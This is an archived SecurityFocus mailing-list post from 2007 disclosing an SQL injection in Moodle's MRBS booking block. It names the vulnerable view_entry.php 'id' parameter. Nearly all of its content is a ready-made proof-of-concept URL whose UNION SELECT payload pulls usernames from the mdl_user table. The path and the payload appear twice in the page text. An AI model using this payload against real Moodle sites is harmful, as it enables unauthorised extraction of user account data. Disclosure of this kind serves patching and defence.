Back to list
|
Post reply
Moodle SQL Injection
Dec 21 2007 10:04AM
root hanicker it
Moodle.org
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&mont
h=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SE
LECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHE
RE%20id=[ID]&day=27&month=10&year=2007
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&mont
h=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SE
LECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHE
RE%20id=[ID]&day=27&month=10&year=2007
[ reply ]